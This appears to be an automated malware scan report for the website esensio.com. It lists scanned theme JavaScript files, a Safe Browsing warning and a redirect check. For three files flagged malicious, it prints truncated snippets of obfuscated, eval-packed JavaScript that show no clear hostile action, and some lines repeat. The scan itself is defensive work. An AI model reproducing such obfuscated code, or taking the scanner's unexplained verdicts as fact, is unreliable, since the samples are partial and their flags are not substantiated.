Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=esensio.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.esensio.com/ | 200 OK Content-Length: 16113 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://www.esensio.com/wp-content/themes/polafolio/js/jquery.dropdownPlain.js | 200 OK Content-Length: 1764 Content-Type: application/javascript | clean |
http://www.esensio.com/wp-content/themes/polafolio/js/ui.core.pack.js | 200 OK Content-Length: 7361 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)  eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(';(4($){$.2i={2j:8,2k:20,2l:2m,2n:17,2o:46,2p:40,2q:35,2r:13,2s:27,2t:36,2u:45,2v:37,2w:2x,2y:2z,2A:2B,2C:2D,2E:2F,2G:2H,2I:34,2J:33,2K:2L,2M:39,2N:16,2O:32,2P:9 Antivirus reports:
| ||
http://www.esensio.com/wp-content/themes/polafolio/js/ui.tabs.pack.js | 200 OK Content-Length: 8140 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(5($){$.2m("f.3",{2n:5(){2.18(19)},2o:5(1A,1B){6((/^c/).2p(1A))2.1a(1B);B{2.p[1A]=1B;2.18()}},w:5(){j 2.$3.w},1C:5(a){j a.1V&&a.1V.T(/\\s/g,\'1W\').T(/[^A-2q Antivirus reports:
| ||
http://www.esensio.com/wp-content/themes/polafolio/js/tools.scrollable.pack.js | 200 OK Content-Length: 6155 Content-Type: application/javascript | clean |
http://www.esensio.com/wp-content/themes/polafolio/js/tools.scrollable.circular.pack.js | 200 OK Content-Length: 3579 Content-Type: application/javascript | clean |
http://www.esensio.com/wp-content/themes/polafolio/js/tools.scrollable.navigator.pack.js | 200 OK Content-Length: 2921 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(4($){4 f(d,o){b d.E("#")!=-1?$(d).g(0):o.F(d).g(0)}$.G.H=4(p){7 3={2:\'.2\',q:\'a\',6:\'I\'};$.J(3,p);b 9.r(4(){7 5=$(9).K(),s=5.L(),2=f(3.2,s),t=5.u();5.u=4(){b t.M(2 Antivirus reports:
| ||
http://www.esensio.com/wp-content/themes/polafolio/js/tools.scrollable.autoscroll.min.js | 200 OK Content-Length: 2441 Content-Type: application/javascript | clean |
http://www.esensio.com/wp-content/themes/polafolio/js/tools.tabs-1.0.4.min.js | 200 OK Content-Length: 4389 Content-Type: application/javascript | clean |
http://www.esensio.com/wp-content/themes/polafolio/js/jquery.color.js | 200 OK Content-Length: 3834 Content-Type: application/javascript | clean |
http://www.esensio.com/wp-content/themes/polafolio/js/jquery.event.drag-2.0.min.js | 200 OK Content-Length: 6210 Content-Type: application/javascript | clean |
http://www.esensio.com/wp-content/themes/polafolio/js/jquery.panda.js | 200 OK Content-Length: 3683 Content-Type: application/javascript | clean |
http://www.esensio.com/wp-content/themes/polafolio/js/jquery.prettyPhoto.js | 200 OK Content-Length: 22576 Content-Type: application/javascript | clean |
http://www.esensio.com/wp-content/themes/polafolio/js/cufon-yui.js | 200 OK Content-Length: 19593 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: esensio.com
Result:
GET / HTTP/1.1
Host: esensio.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: esensio.com
Referer: http://www.google.com/search?q=esensio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: esensio.com
Referer: http://www.google.com/search?q=esensio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.